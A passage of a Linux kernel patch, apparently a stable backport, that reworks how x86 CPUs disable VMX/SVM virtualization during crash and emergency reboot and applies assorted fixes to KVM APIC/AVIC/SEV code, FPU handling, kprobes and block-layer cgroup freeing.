+ #include <linux/kdebug.h>
+ #include <asm/cpu.h>
+ #include <asm/reboot.h>
+-#include <asm/virtext.h>
+ #include <asm/intel_pt.h>
+ #include <asm/crash.h>
+ #include <asm/cmdline.h>
+@@ -81,15 +80,6 @@ static void kdump_nmi_callback(int cpu, struct pt_regs *regs)
+ 	 */
+ 	cpu_crash_vmclear_loaded_vmcss();
+ 
+-	/* Disable VMX or SVM if needed.
+-	 *
+-	 * We need to disable virtualization on all CPUs.
+-	 * Having VMX or SVM enabled on any CPU may break rebooting
+-	 * after the kdump kernel has finished its task.
+-	 */
+-	cpu_emergency_vmxoff();
+-	cpu_emergency_svm_disable();
+-
+ 	/*
+ 	 * Disable Intel PT to stop its logging
+ 	 */
+@@ -148,12 +138,7 @@ void native_machine_crash_shutdown(struct pt_regs *regs)
+ 	 */
+ 	cpu_crash_vmclear_loaded_vmcss();
+ 
+-	/* Booting kdump kernel with VMX or SVM enabled won't work,
+-	 * because (among other limitations) we can't disable paging
+-	 * with the virt flags.
+-	 */
+-	cpu_emergency_vmxoff();
+-	cpu_emergency_svm_disable();
++	cpu_emergency_disable_virtualization();
+ 
+ 	/*
+ 	 * Disable Intel PT to stop its logging
+diff --git a/arch/x86/kernel/fpu/context.h b/arch/x86/kernel/fpu/context.h
+index 958accf2ccf07..9fcfa5c4dad79 100644
+--- a/arch/x86/kernel/fpu/context.h
++++ b/arch/x86/kernel/fpu/context.h
+@@ -57,7 +57,7 @@ static inline void fpregs_restore_userregs(void)
+ 	struct fpu *fpu = &current->thread.fpu;
+ 	int cpu = smp_processor_id();
+ 
+-	if (WARN_ON_ONCE(current->flags & PF_KTHREAD))
++	if (WARN_ON_ONCE(current->flags & (PF_KTHREAD | PF_IO_WORKER)))
+ 		return;
+ 
+ 	if (!fpregs_state_valid(fpu, cpu)) {
+diff --git a/arch/x86/kernel/fpu/core.c b/arch/x86/kernel/fpu/core.c
+index 9baa89a8877d0..caf33486dc5ee 100644
+--- a/arch/x86/kernel/fpu/core.c
++++ b/arch/x86/kernel/fpu/core.c
+@@ -426,7 +426,7 @@ void kernel_fpu_begin_mask(unsigned int kfpu_mask)
+ 
+ 	this_cpu_write(in_kernel_fpu, true);
+ 
+-	if (!(current->flags & PF_KTHREAD) &&
++	if (!(current->flags & (PF_KTHREAD | PF_IO_WORKER)) &&
+ 	    !test_thread_flag(TIF_NEED_FPU_LOAD)) {
+ 		set_thread_flag(TIF_NEED_FPU_LOAD);
+ 		save_fpregs_to_fpstate(&current->thread.fpu);
+@@ -853,12 +853,12 @@ int fpu__exception_code(struct fpu *fpu, int trap_nr)
+  * Initialize register state that may prevent from entering low-power idle.
+  * This function will be invoked from the cpuidle driver only when needed.
+  */
+-void fpu_idle_fpregs(void)
++noinstr void fpu_idle_fpregs(void)
+ {
+ 	/* Note: AMX_TILE being enabled implies XGETBV1 support */
+ 	if (cpu_feature_enabled(X86_FEATURE_AMX_TILE) &&
+ 	    (xfeatures_in_use() & XFEATURE_MASK_XTILE)) {
+ 		tile_release();
+-		fpregs_deactivate(&current->thread.fpu);
++		__this_cpu_write(fpu_fpregs_owner_ctx, NULL);
+ 	}
+ }
+diff --git a/arch/x86/kernel/kprobes/opt.c b/arch/x86/kernel/kprobes/opt.c
+index e57e07b0edb64..57b0037d0a996 100644
+--- a/arch/x86/kernel/kprobes/opt.c
++++ b/arch/x86/kernel/kprobes/opt.c
+@@ -46,8 +46,8 @@ unsigned long __recover_optprobed_insn(kprobe_opcode_t *buf, unsigned long addr)
+ 		/* This function only handles jump-optimized kprobe */
+ 		if (kp && kprobe_optimized(kp)) {
+ 			op = container_of(kp, struct optimized_kprobe, kp);
+-			/* If op->list is not empty, op is under optimizing */
+-			if (list_empty(&op->list))
++			/* If op is optimized or under unoptimizing */
++			if (list_empty(&op->list) || optprobe_queued_unopt(op))
+ 				goto found;
+ 		}
+ 	}
+@@ -353,7 +353,7 @@ int arch_check_optimized_kprobe(struct optimized_kprobe *op)
+ 
+ 	for (i = 1; i < op->optinsn.size; i++) {
+ 		p = get_kprobe(op->kp.addr + i);
+-		if (p && !kprobe_disabled(p))
++		if (p && !kprobe_disarmed(p))
+ 			return -EEXIST;
+ 	}
+ 
+diff --git a/arch/x86/kernel/reboot.c b/arch/x86/kernel/reboot.c
+index c3636ea4aa71f..d03c551defccf 100644
+--- a/arch/x86/kernel/reboot.c
++++ b/arch/x86/kernel/reboot.c
+@@ -528,33 +528,29 @@ static inline void kb_wait(void)
+ 	}
+ }
+ 
+-static void vmxoff_nmi(int cpu, struct pt_regs *regs)
+-{
+-	cpu_emergency_vmxoff();
+-}
++static inline void nmi_shootdown_cpus_on_restart(void);
+ 
+-/* Use NMIs as IPIs to tell all CPUs to disable virtualization */
+-static void emergency_vmx_disable_all(void)
++static void emergency_reboot_disable_virtualization(void)
+ {
+ 	/* Just make sure we won't change CPUs while doing this */
+ 	local_irq_disable();
+ 
+ 	/*
+-	 * Disable VMX on all CPUs before rebooting, otherwise we risk hanging
+-	 * the machine, because the CPU blocks INIT when it's in VMX root.
++	 * Disable virtualization on all CPUs before rebooting to avoid hanging
++	 * the system, as VMX and SVM block INIT when running in the host.
+ 	 *
+ 	 * We can't take any locks and we may be on an inconsistent state, so
+-	 * use NMIs as IPIs to tell the other CPUs to exit VMX root and halt.
++	 * use NMIs as IPIs to tell the other CPUs to disable VMX/SVM and halt.
+ 	 *
+-	 * Do the NMI shootdown even if VMX if off on _this_ CPU, as that
+-	 * doesn't prevent a different CPU from being in VMX root operation.
++	 * Do the NMI shootdown even if virtualization is off on _this_ CPU, as
++	 * other CPUs may have virtualization enabled.
+ 	 */
+-	if (cpu_has_vmx()) {
+-		/* Safely force _this_ CPU out of VMX root operation. */
+-		__cpu_emergency_vmxoff();
++	if (cpu_has_vmx() || cpu_has_svm(NULL)) {
++		/* Safely force _this_ CPU out of VMX/SVM operation. */
++		cpu_emergency_disable_virtualization();
+ 
+-		/* Halt and exit VMX root operation on the other CPUs. */
+-		nmi_shootdown_cpus(vmxoff_nmi);
++		/* Disable VMX/SVM and halt on other CPUs. */
++		nmi_shootdown_cpus_on_restart();
+ 	}
+ }
+ 
+@@ -590,7 +586,7 @@ static void native_machine_emergency_restart(void)
+ 	unsigned short mode;
+ 
+ 	if (reboot_emergency)
+-		emergency_vmx_disable_all();
++		emergency_reboot_disable_virtualization();
+ 
+ 	tboot_shutdown(TB_SHUTDOWN_REBOOT);
+ 
+@@ -795,6 +791,17 @@ void machine_crash_shutdown(struct pt_regs *regs)
+ /* This is the CPU performing the emergency shutdown work. */
+ int crashing_cpu = -1;
+ 
++/*
++ * Disable virtualization, i.e. VMX or SVM, to ensure INIT is recognized during
++ * reboot.  VMX blocks INIT if the CPU is post-VMXON, and SVM blocks INIT if
++ * GIF=0, i.e. if the crash occurred between CLGI and STGI.
++ */
++void cpu_emergency_disable_virtualization(void)
++{
++	cpu_emergency_vmxoff();
++	cpu_emergency_svm_disable();
++}
++
+ #if defined(CONFIG_SMP)
+ 
+ static nmi_shootdown_cb shootdown_callback;
+@@ -817,7 +824,14 @@ static int crash_nmi_callback(unsigned int val, struct pt_regs *regs)
+ 		return NMI_HANDLED;
+ 	local_irq_disable();
+ 
+-	shootdown_callback(cpu, regs);
++	if (shootdown_callback)
++		shootdown_callback(cpu, regs);
++
++	/*
++	 * Prepare the CPU for reboot _after_ invoking the callback so that the
++	 * callback can safely use virtualization instructions, e.g. VMCLEAR.
++	 */
++	cpu_emergency_disable_virtualization();
+ 
+ 	atomic_dec(&waiting_for_crash_ipi);
+ 	/* Assume hlt works */
+@@ -828,18 +842,32 @@ static int crash_nmi_callback(unsigned int val, struct pt_regs *regs)
+ 	return NMI_HANDLED;
+ }
+ 
+-/*
+- * Halt all other CPUs, calling the specified function on each of them
++/**
++ * nmi_shootdown_cpus - Stop other CPUs via NMI
++ * @callback:	Optional callback to be invoked from the NMI handler
++ *
++ * The NMI handler on the remote CPUs invokes @callback, if not
++ * NULL, first and then disables virtualization to ensure that
++ * INIT is recognized during reboot.
+  *
+- * This function can be used to halt all other CPUs on crash
+- * or emergency reboot time. The function passed as parameter
+- * will be called inside a NMI handler on all CPUs.
++ * nmi_shootdown_cpus() can only be invoked once. After the first
++ * invocation all other CPUs are stuck in crash_nmi_callback() and
++ * cannot respond to a second NMI.
+  */
+ void nmi_shootdown_cpus(nmi_shootdown_cb callback)
+ {
+ 	unsigned long msecs;
++
+ 	local_irq_disable();
+ 
++	/*
++	 * Avoid certain doom if a shootdown already occurred; re-registering
++	 * the NMI handler will cause list corruption, modifying the callback
++	 * will do who knows what, etc...
++	 */
++	if (WARN_ON_ONCE(crash_ipi_issued))
++		return;
++
+ 	/* Make a note of crashing cpu. Will be used in NMI callback. */
+ 	crashing_cpu = safe_smp_processor_id();
+ 
+@@ -867,7 +895,17 @@ void nmi_shootdown_cpus(nmi_shootdown_cb callback)
+ 		msecs--;
+ 	}
+ 
+-	/* Leave the nmi callback set */
++	/*
++	 * Leave the nmi callback set, shootdown is a one-time thing.  Clearing
++	 * the callback could result in a NULL pointer dereference if a CPU
++	 * (finally) responds after the timeout expires.
++	 */
++}
++
++static inline void nmi_shootdown_cpus_on_restart(void)
++{
++	if (!crash_ipi_issued)
++		nmi_shootdown_cpus(NULL);
+ }
+ 
+ /*
+@@ -897,6 +935,8 @@ void nmi_shootdown_cpus(nmi_shootdown_cb callback)
+ 	/* No other CPUs to shoot down */
+ }
+ 
++static inline void nmi_shootdown_cpus_on_restart(void) { }
++
+ void run_crash_ipi_callback(struct pt_regs *regs)
+ {
+ }
+diff --git a/arch/x86/kernel/signal.c b/arch/x86/kernel/signal.c
+index 1504eb8d25aa6..004cb30b74198 100644
+--- a/arch/x86/kernel/signal.c
++++ b/arch/x86/kernel/signal.c
+@@ -360,7 +360,7 @@ static bool strict_sigaltstack_size __ro_after_init = false;
+ 
+ static int __init strict_sas_size(char *arg)
+ {
+-	return kstrtobool(arg, &strict_sigaltstack_size);
++	return kstrtobool(arg, &strict_sigaltstack_size) == 0;
+ }
+ __setup("strict_sas_size", strict_sas_size);
+ 
+diff --git a/arch/x86/kernel/smp.c b/arch/x86/kernel/smp.c
+index 06db901fabe8e..375b33ecafa27 100644
+--- a/arch/x86/kernel/smp.c
++++ b/arch/x86/kernel/smp.c
+@@ -32,7 +32,7 @@
+ #include <asm/mce.h>
+ #include <asm/trace/irq_vectors.h>
+ #include <asm/kexec.h>
+-#include <asm/virtext.h>
++#include <asm/reboot.h>
+ 
+ /*
+  *	Some notes on x86 processor bugs affecting SMP operation:
+@@ -122,7 +122,7 @@ static int smp_stop_nmi_callback(unsigned int val, struct pt_regs *regs)
+ 	if (raw_smp_processor_id() == atomic_read(&stopping_cpu))
+ 		return NMI_HANDLED;
+ 
+-	cpu_emergency_vmxoff();
++	cpu_emergency_disable_virtualization();
+ 	stop_this_cpu(NULL);
+ 
+ 	return NMI_HANDLED;
+@@ -134,7 +134,7 @@ static int smp_stop_nmi_callback(unsigned int val, struct pt_regs *regs)
+ DEFINE_IDTENTRY_SYSVEC(sysvec_reboot)
+ {
+ 	ack_APIC_irq();
+-	cpu_emergency_vmxoff();
++	cpu_emergency_disable_virtualization();
+ 	stop_this_cpu(NULL);
+ }
+ 
+diff --git a/arch/x86/kvm/lapic.c b/arch/x86/kvm/lapic.c
+index 4efdb4a4d72c6..7f0c02b5dfdd4 100644
+--- a/arch/x86/kvm/lapic.c
++++ b/arch/x86/kvm/lapic.c
+@@ -2072,10 +2072,18 @@ static void kvm_lapic_xapic_id_updated(struct kvm_lapic *apic)
+ {
+ 	struct kvm *kvm = apic->vcpu->kvm;
+ 
++	if (!kvm_apic_hw_enabled(apic))
++		return;
++
+ 	if (KVM_BUG_ON(apic_x2apic_mode(apic), kvm))
+ 		return;
+ 
+-	if (kvm_xapic_id(apic) == apic->vcpu->vcpu_id)
++	/*
++	 * Deliberately truncate the vCPU ID when detecting a modified APIC ID
++	 * to avoid false positives if the vCPU ID, i.e. x2APIC ID, is a 32-bit
++	 * value.
++	 */
++	if (kvm_xapic_id(apic) == (u8)apic->vcpu->vcpu_id)
+ 		return;
+ 
+ 	kvm_set_apicv_inhibit(apic->vcpu->kvm, APICV_INHIBIT_REASON_APIC_ID_MODIFIED);
+@@ -2219,10 +2227,14 @@ static int kvm_lapic_reg_write(struct kvm_lapic *apic, u32 reg, u32 val)
+ 		break;
+ 
+ 	case APIC_SELF_IPI:
+-		if (apic_x2apic_mode(apic))
+-			kvm_apic_send_ipi(apic, APIC_DEST_SELF | (val & APIC_VECTOR_MASK), 0);
+-		else
++		/*
++		 * Self-IPI exists only when x2APIC is enabled.  Bits 7:0 hold
++		 * the vector, everything else is reserved.
++		 */
++		if (!apic_x2apic_mode(apic) || (val & ~APIC_VECTOR_MASK))
+ 			ret = 1;
++		else
++			kvm_apic_send_ipi(apic, APIC_DEST_SELF | val, 0);
+ 		break;
+ 	default:
+ 		ret = 1;
+@@ -2284,23 +2296,18 @@ void kvm_apic_write_nodecode(struct kvm_vcpu *vcpu, u32 offset)
+ 	struct kvm_lapic *apic = vcpu->arch.apic;
+ 	u64 val;
+ 
+-	if (apic_x2apic_mode(apic)) {
+-		if (KVM_BUG_ON(kvm_lapic_msr_read(apic, offset, &val), vcpu->kvm))
+-			return;
+-	} else {
+-		val = kvm_lapic_get_reg(apic, offset);
+-	}
+-
+ 	/*
+ 	 * ICR is a single 64-bit register when x2APIC is enabled.  For legacy
+ 	 * xAPIC, ICR writes need to go down the common (slightly slower) path
+ 	 * to get the upper half from ICR2.
+ 	 */
+ 	if (apic_x2apic_mode(apic) && offset == APIC_ICR) {
++		val = kvm_lapic_get_reg64(apic, APIC_ICR);
+ 		kvm_apic_send_ipi(apic, (u32)val, (u32)(val >> 32));
+ 		trace_kvm_apic_write(APIC_ICR, val);
+ 	} else {
+ 		/* TODO: optimize to just emulate side effect w/o one more write */
++		val = kvm_lapic_get_reg(apic, offset);
+ 		kvm_lapic_reg_write(apic, offset, (u32)val);
+ 	}
+ }
+@@ -2429,6 +2436,7 @@ void kvm_apic_update_apicv(struct kvm_vcpu *vcpu)
+ 		 */
+ 		apic->isr_count = count_vectors(apic->regs + APIC_ISR);
+ 	}
++	apic->highest_isr_cache = -1;
+ }
+ 
+ void kvm_lapic_reset(struct kvm_vcpu *vcpu, bool init_event)
+@@ -2484,7 +2492,6 @@ void kvm_lapic_reset(struct kvm_vcpu *vcpu, bool init_event)
+ 		kvm_lapic_set_reg(apic, APIC_TMR + 0x10 * i, 0);
+ 	}
+ 	kvm_apic_update_apicv(vcpu);
+-	apic->highest_isr_cache = -1;
+ 	update_divide_count(apic);
+ 	atomic_set(&apic->lapic_timer.pending, 0);
+ 
+@@ -2772,7 +2779,6 @@ int kvm_apic_set_state(struct kvm_vcpu *vcpu, struct kvm_lapic_state *s)
+ 	__start_apic_timer(apic, APIC_TMCCT);
+ 	kvm_lapic_set_reg(apic, APIC_TMCCT, 0);
+ 	kvm_apic_update_apicv(vcpu);
+-	apic->highest_isr_cache = -1;
+ 	if (apic->apicv_active) {
+ 		static_call_cond(kvm_x86_apicv_post_state_restore)(vcpu);
+ 		static_call_cond(kvm_x86_hwapic_irr_update)(vcpu, apic_find_highest_irr(apic));
+@@ -2943,13 +2949,17 @@ static int kvm_lapic_msr_read(struct kvm_lapic *apic, u32 reg, u64 *data)
+ static int kvm_lapic_msr_write(struct kvm_lapic *apic, u32 reg, u64 data)
+ {
+ 	/*
+-	 * ICR is a 64-bit register in x2APIC mode (and Hyper'v PV vAPIC) and
++	 * ICR is a 64-bit register in x2APIC mode (and Hyper-V PV vAPIC) and
+ 	 * can be written as such, all other registers remain accessible only
+ 	 * through 32-bit reads/writes.
+ 	 */
+ 	if (reg == APIC_ICR)
+ 		return kvm_x2apic_icr_write(apic, data);
+ 
++	/* Bits 63:32 are reserved in all other registers. */
++	if (data >> 32)
++		return 1;
++
+ 	return kvm_lapic_reg_write(apic, reg, (u32)data);
+ }
+ 
+diff --git a/arch/x86/kvm/svm/avic.c b/arch/x86/kvm/svm/avic.c
+index 6919dee69f182..97ad0661f9639 100644
+--- a/arch/x86/kvm/svm/avic.c
++++ b/arch/x86/kvm/svm/avic.c
+@@ -86,6 +86,12 @@ static void avic_activate_vmcb(struct vcpu_svm *svm)
+ 		/* Disabling MSR intercept for x2APIC registers */
+ 		svm_set_x2apic_msr_interception(svm, false);
+ 	} else {
++		/*
++		 * Flush the TLB, the guest may have inserted a non-APIC
++		 * mapping into the TLB while AVIC was disabled.
++		 */
++		kvm_make_request(KVM_REQ_TLB_FLUSH_CURRENT, &svm->vcpu);
++
+ 		/* For xAVIC and hybrid-xAVIC modes */
+ 		vmcb->control.avic_physical_id |= AVIC_MAX_PHYSICAL_ID;
+ 		/* Enabling MSR intercept for x2APIC registers */
+@@ -496,14 +502,18 @@ int avic_incomplete_ipi_interception(struct kvm_vcpu *vcpu)
+ 	trace_kvm_avic_incomplete_ipi(vcpu->vcpu_id, icrh, icrl, id, index);
+ 
+ 	switch (id) {
++	case AVIC_IPI_FAILURE_INVALID_TARGET:
+ 	case AVIC_IPI_FAILURE_INVALID_INT_TYPE:
+ 		/*
+ 		 * Emulate IPIs that are not handled by AVIC hardware, which
+-		 * only virtualizes Fixed, Edge-Triggered INTRs.  The exit is
+-		 * a trap, e.g. ICR holds the correct value and RIP has been
+-		 * advanced, KVM is responsible only for emulating the IPI.
+-		 * Sadly, hardware may sometimes leave the BUSY flag set, in
+-		 * which case KVM needs to emulate the ICR write as well in
++		 * only virtualizes Fixed, Edge-Triggered INTRs, and falls over
++		 * if _any_ targets are invalid, e.g. if the logical mode mask
++		 * is a superset of running vCPUs.
++		 *
++		 * The exit is a trap, e.g. ICR holds the correct value and RIP
++		 * has been advanced, KVM is responsible only for emulating the
++		 * IPI.  Sadly, hardware may sometimes leave the BUSY flag set,
++		 * in which case KVM needs to emulate the ICR write as well in
+ 		 * order to clear the BUSY flag.
+ 		 */
+ 		if (icrl & APIC_ICR_BUSY)
+@@ -519,8 +529,6 @@ int avic_incomplete_ipi_interception(struct kvm_vcpu *vcpu)
+ 		 */
+ 		avic_kick_target_vcpus(vcpu->kvm, apic, icrl, icrh, index);
+ 		break;
+-	case AVIC_IPI_FAILURE_INVALID_TARGET:
+-		break;
+ 	case AVIC_IPI_FAILURE_INVALID_BACKING_PAGE:
+ 		WARN_ONCE(1, "Invalid backing page\n");
+ 		break;
+@@ -739,18 +747,6 @@ void avic_apicv_post_state_restore(struct kvm_vcpu *vcpu)
+ 	avic_handle_ldr_update(vcpu);
+ }
+ 
+-void avic_set_virtual_apic_mode(struct kvm_vcpu *vcpu)
+-{
+-	if (!lapic_in_kernel(vcpu) || avic_mode == AVIC_MODE_NONE)
+-		return;
+-
+-	if (kvm_get_apic_mode(vcpu) == LAPIC_MODE_INVALID) {
+-		WARN_ONCE(true, "Invalid local APIC state (vcpu_id=%d)", vcpu->vcpu_id);
+-		return;
+-	}
+-	avic_refresh_apicv_exec_ctrl(vcpu);
+-}
+-
+ static int avic_set_pi_irte_mode(struct kvm_vcpu *vcpu, bool activate)
+ {
+ 	int ret = 0;
+@@ -1092,17 +1088,18 @@ void avic_vcpu_put(struct kvm_vcpu *vcpu)
+ 	WRITE_ONCE(*(svm->avic_physical_id_cache), entry);
+ }
+ 
+-
+-void avic_refresh_apicv_exec_ctrl(struct kvm_vcpu *vcpu)
++void avic_refresh_virtual_apic_mode(struct kvm_vcpu *vcpu)
+ {
+ 	struct vcpu_svm *svm = to_svm(vcpu);
+ 	struct vmcb *vmcb = svm->vmcb01.ptr;
+-	bool activated = kvm_vcpu_apicv_active(vcpu);
++
++	if (!lapic_in_kernel(vcpu) || avic_mode == AVIC_MODE_NONE)
++		return;
+ 
+ 	if (!enable_apicv)
+ 		return;
+ 
+-	if (activated) {
++	if (kvm_vcpu_apicv_active(vcpu)) {
+ 		/**
+ 		 * During AVIC temporary deactivation, guest could update
+ 		 * APIC ID, DFR and LDR registers, which would not be trapped
+@@ -1116,6 +1113,16 @@ void avic_refresh_apicv_exec_ctrl(struct kvm_vcpu *vcpu)
+ 		avic_deactivate_vmcb(svm);
+ 	}
+ 	vmcb_mark_dirty(vmcb, VMCB_AVIC);
++}
++
++void avic_refresh_apicv_exec_ctrl(struct kvm_vcpu *vcpu)
++{
++	bool activated = kvm_vcpu_apicv_active(vcpu);
++
++	if (!enable_apicv)
++		return;
++
++	avic_refresh_virtual_apic_mode(vcpu);
+ 
+ 	if (activated)
+ 		avic_vcpu_load(vcpu, vcpu->cpu);
+diff --git a/arch/x86/kvm/svm/sev.c b/arch/x86/kvm/svm/sev.c
+index 86d6897f48068..579038eee94a3 100644
+--- a/arch/x86/kvm/svm/sev.c
++++ b/arch/x86/kvm/svm/sev.c
+@@ -1293,7 +1293,7 @@ static int sev_send_update_data(struct kvm *kvm, struct kvm_sev_cmd *argp)
+ 
+ 	/* Check if we are crossing the page boundary */
+ 	offset = params.guest_uaddr & (PAGE_SIZE - 1);
+-	if ((params.guest_len + offset > PAGE_SIZE))
++	if (params.guest_len > PAGE_SIZE || (params.guest_len + offset) > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	/* Pin guest memory */
+@@ -1473,7 +1473,7 @@ static int sev_receive_update_data(struct kvm *kvm, struct kvm_sev_cmd *argp)
+ 
+ 	/* Check if we are crossing the page boundary */
+ 	offset = params.guest_uaddr & (PAGE_SIZE - 1);
+-	if ((params.guest_len + offset > PAGE_SIZE))
++	if (params.guest_len > PAGE_SIZE || (params.guest_len + offset) > PAGE_SIZE)
+ 		return -EINVAL;
+ 
+ 	hdr = psp_copy_user_blob(params.hdr_uaddr, params.hdr_len);
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 9a194aa1a75a4..22d054ba5939a 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -4771,7 +4771,7 @@ static struct kvm_x86_ops svm_x86_ops __initdata = {
+ 	.enable_nmi_window = svm_enable_nmi_window,
+ 	.enable_irq_window = svm_enable_irq_window,
+ 	.update_cr8_intercept = svm_update_cr8_intercept,
+-	.set_virtual_apic_mode = avic_set_virtual_apic_mode,
++	.set_virtual_apic_mode = avic_refresh_virtual_apic_mode,
+ 	.refresh_apicv_exec_ctrl = avic_refresh_apicv_exec_ctrl,
+ 	.check_apicv_inhibit_reasons = avic_check_apicv_inhibit_reasons,
+ 	.apicv_post_state_restore = avic_apicv_post_state_restore,
+diff --git a/arch/x86/kvm/svm/svm.h b/arch/x86/kvm/svm/svm.h
+index 4826e6cc611bf..d0ed3f5952295 100644
+--- a/arch/x86/kvm/svm/svm.h
++++ b/arch/x86/kvm/svm/svm.h
+@@ -648,7 +648,7 @@ void avic_vcpu_blocking(struct kvm_vcpu *vcpu);
+ void avic_vcpu_unblocking(struct kvm_vcpu *vcpu);
+ void avic_ring_doorbell(struct kvm_vcpu *vcpu);
+ unsigned long avic_vcpu_get_apicv_inhibit_reasons(struct kvm_vcpu *vcpu);
+-void avic_set_virtual_apic_mode(struct kvm_vcpu *vcpu);
++void avic_refresh_virtual_apic_mode(struct kvm_vcpu *vcpu);
+ 
+ 
+ /* sev.c */
+diff --git a/arch/x86/kvm/svm/svm_onhyperv.h b/arch/x86/kvm/svm/svm_onhyperv.h
+index 45faf84476cec..65c355b4b8bf0 100644
+--- a/arch/x86/kvm/svm/svm_onhyperv.h
++++ b/arch/x86/kvm/svm/svm_onhyperv.h
+@@ -30,7 +30,7 @@ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ 		hve->hv_enlightenments_control.msr_bitmap = 1;
+ }
+ 
+-static inline void svm_hv_hardware_setup(void)
++static inline __init void svm_hv_hardware_setup(void)
+ {
+ 	if (npt_enabled &&
+ 	    ms_hyperv.nested_features & HV_X64_NESTED_ENLIGHTENED_TLB) {
+@@ -84,7 +84,7 @@ static inline void svm_hv_init_vmcb(struct vmcb *vmcb)
+ {
+ }
+ 
+-static inline void svm_hv_hardware_setup(void)
++static inline __init void svm_hv_hardware_setup(void)
+ {
+ }
+ 
+diff --git a/arch/x86/kvm/vmx/hyperv.h b/arch/x86/kvm/vmx/hyperv.h
+index 571e7929d14e7..9dee71441b594 100644
+--- a/arch/x86/kvm/vmx/hyperv.h
++++ b/arch/x86/kvm/vmx/hyperv.h
+@@ -190,16 +190,6 @@ static inline u16 evmcs_read16(unsigned long field)
+ 	return *(u16 *)((char *)current_evmcs + offset);
+ }
+ 
+-static inline void evmcs_touch_msr_bitmap(void)
+-{
+-	if (unlikely(!current_evmcs))
+-		return;
+-
+-	if (current_evmcs->hv_enlightenments_control.msr_bitmap)
+-		current_evmcs->hv_clean_fields &=
+-			~HV_VMX_ENLIGHTENED_CLEAN_FIELD_MSR_BITMAP;
+-}
+-
+ static inline void evmcs_load(u64 phys_addr)
+ {
+ 	struct hv_vp_assist_page *vp_ap =
+@@ -219,7 +209,6 @@ static inline u64 evmcs_read64(unsigned long field) { return 0; }
+ static inline u32 evmcs_read32(unsigned long field) { return 0; }
+ static inline u16 evmcs_read16(unsigned long field) { return 0; }
+ static inline void evmcs_load(u64 phys_addr) {}
+-static inline void evmcs_touch_msr_bitmap(void) {}
+ #endif /* IS_ENABLED(CONFIG_HYPERV) */
+ 
+ #define EVMPTR_INVALID (-1ULL)
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 7eec0226d56a2..939e395cda3ff 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -3865,8 +3865,13 @@ static void vmx_msr_bitmap_l01_changed(struct vcpu_vmx *vmx)
+ 	 * 'Enlightened MSR Bitmap' feature L0 needs to know that MSR
+ 	 * bitmap has changed.
+ 	 */
+-	if (static_branch_unlikely(&enable_evmcs))
+-		evmcs_touch_msr_bitmap();
++	if (IS_ENABLED(CONFIG_HYPERV) && static_branch_unlikely(&enable_evmcs)) {
++		struct hv_enlightened_vmcs *evmcs = (void *)vmx->vmcs01.vmcs;
++
++		if (evmcs->hv_enlightenments_control.msr_bitmap)
++			evmcs->hv_clean_fields &=
++				~HV_VMX_ENLIGHTENED_CLEAN_FIELD_MSR_BITMAP;
++	}
+ 
+ 	vmx->nested.force_msr_bitmap_recalc = true;
+ }
+diff --git a/block/bio-integrity.c b/block/bio-integrity.c
+index 3f5685c00e360..91ffee6fc8cb4 100644
+--- a/block/bio-integrity.c
++++ b/block/bio-integrity.c
+@@ -418,6 +418,7 @@ int bio_integrity_clone(struct bio *bio, struct bio *bio_src,
+ 
+ 	bip->bip_vcnt = bip_src->bip_vcnt;
+ 	bip->bip_iter = bip_src->bip_iter;
++	bip->bip_flags = bip_src->bip_flags & ~BIP_BLOCK_INTEGRITY;
+ 
+ 	return 0;
+ }
+diff --git a/block/bio.c b/block/bio.c
+index ab59a491a883e..4e7d11672306b 100644
+--- a/block/bio.c
++++ b/block/bio.c
+@@ -773,6 +773,7 @@ static inline void bio_put_percpu_cache(struct bio *bio)
+ 
+ 	if ((bio->bi_opf & REQ_POLLED) && !WARN_ON_ONCE(in_interrupt())) {
+ 		bio->bi_next = cache->free_list;
++		bio->bi_bdev = NULL;
+ 		cache->free_list = bio;
+ 		cache->nr++;
+ 	} else {
+diff --git a/block/blk-cgroup.c b/block/blk-cgroup.c
+index 9ac1efb053e08..45881f8c79130 100644
+--- a/block/blk-cgroup.c
++++ b/block/blk-cgroup.c
+@@ -118,14 +118,32 @@ static void blkg_free_workfn(struct work_struct *work)
+ {
+ 	struct blkcg_gq *blkg = container_of(work, struct blkcg_gq,
+ 					     free_work);
++	struct request_queue *q = blkg->q;
+ 	int i;
+ 
++	/*
++	 * pd_free_fn() can also be called from blkcg_deactivate_policy(),
++	 * in order to make sure pd_free_fn() is called in order, the deletion
++	 * of the list blkg->q_node is delayed to here from blkg_destroy(), and
++	 * blkcg_mutex is used to synchronize blkg_free_workfn() and
++	 * blkcg_deactivate_policy().
++	 */
++	if (q)
++		mutex_lock(&q->blkcg_mutex);
++
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++)
+ 		if (blkg->pd[i])
+ 			blkcg_policy[i]->pd_free_fn(blkg->pd[i]);
+ 
+-	if (blkg->q)
+-		blk_put_queue(blkg->q);
++	if (blkg->parent)
++		blkg_put(blkg->parent);
++
++	if (q) {
++		list_del_init(&blkg->q_node);
++		mutex_unlock(&q->blkcg_mutex);
++		blk_put_queue(q);
++	}
++
+ 	free_percpu(blkg->iostat_cpu);
+ 	percpu_ref_exit(&blkg->refcnt);
+ 	kfree(blkg);
+@@ -158,8 +176,6 @@ static void __blkg_release(struct rcu_head *rcu)
+ 
+ 	/* release the blkcg and parent blkg refs this blkg has been holding */
+ 	css_put(&blkg->blkcg->css);
+-	if (blkg->parent)
+-		blkg_put(blkg->parent);
+ 	blkg_free(blkg);
+ }
+ 
+@@ -458,9 +474,14 @@ static void blkg_destroy(struct blkcg_gq *blkg)
+ 	lockdep_assert_held(&blkg->q->queue_lock);
+ 	lockdep_assert_held(&blkcg->lock);
+ 
+-	/* Something wrong if we are trying to remove same group twice */
+-	WARN_ON_ONCE(list_empty(&blkg->q_node));
+-	WARN_ON_ONCE(hlist_unhashed(&blkg->blkcg_node));
++	/*
++	 * blkg stays on the queue list until blkg_free_workfn(), see details in
++	 * blkg_free_workfn(), hence this function can be called from
++	 * blkcg_destroy_blkgs() first and again from blkg_destroy_all() before
++	 * blkg_free_workfn().
++	 */
++	if (hlist_unhashed(&blkg->blkcg_node))
++		return;
+ 
+ 	for (i = 0; i < BLKCG_MAX_POLS; i++) {
+ 		struct blkcg_policy *pol = blkcg_policy[i];
